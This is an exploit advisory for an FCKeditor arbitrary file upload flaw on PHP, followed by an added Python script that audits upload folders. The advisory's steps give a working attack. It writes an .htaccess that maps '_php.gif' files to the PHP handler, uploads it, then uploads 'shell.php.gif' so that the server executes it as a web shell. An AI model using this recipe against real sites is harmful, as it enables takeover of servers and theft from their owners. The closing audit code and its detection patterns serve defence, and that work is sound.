FCKeditor Upload Vulnerability (all PHP versions)
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess file with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the file name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available on the server.
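As an added defensive check (not part of the original advisory or of FCKeditor), the following Python audit scans an upload root for the two artefacts the steps above leave behind: an .htaccess that hands a non-script extension to the PHP handler, and file names carrying the renamed double extension. The directory layout under userfiles/ and the sample entries are constructed assumptions.

```python
# Added defensive check: audit an upload directory for an .htaccess that maps
# a file pattern to the PHP handler and for (renamed) double-extension names.
import os
import re

# Directives that change how Apache executes a file (constructed sample set).
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+.*php",
                        re.IGNORECASE | re.MULTILINE)
# Heuristic: "shell.php.gif" renamed to "shell_php.gif", or a double extension
# left intact; benign names such as "my_php.txt" will also be flagged for review.
SUSPECT_NAME_RE = re.compile(r"(_php\d?\.|\.php\d?\.|\.phtml\.)", re.IGNORECASE)


def audit_upload_entries(entries):
    """entries: {relative_path: text content}. Returns [(path, reason), ...]."""
    findings = []
    for path, content in sorted(entries.items()):
        name = os.path.basename(path)
        if name.lower().startswith(".htaccess"):
            if HANDLER_RE.search(content):
                findings.append((path, "htaccess maps a file pattern to the PHP handler"))
            else:
                findings.append((path, "htaccess present in upload directory"))
        elif SUSPECT_NAME_RE.search(name):
            findings.append((path, "double-extension upload name"))
    return findings


def audit_upload_dir(root):
    """Walk a real upload root (e.g. FCKeditor's userfiles/) and audit it."""
    entries = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    entries[os.path.relpath(full, root)] = fh.read(4096)
            except OSError:
                entries[os.path.relpath(full, root)] = ""  # unreadable: name check only
    return audit_upload_entries(entries)


# Constructed sample mirroring the steps above; not data from a real server.
SAMPLE_ENTRIES = {
    "userfiles/file/.htaccess":
        '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n',
    "userfiles/file/shell_php.gif": "GIF89a...",
    "userfiles/image/photo.gif": "GIF89a...",
}
```

Running audit_upload_entries(SAMPLE_ENTRIES) reports the .htaccess and shell_php.gif and leaves photo.gif alone; audit_upload_dir() applies the same checks to a real upload root.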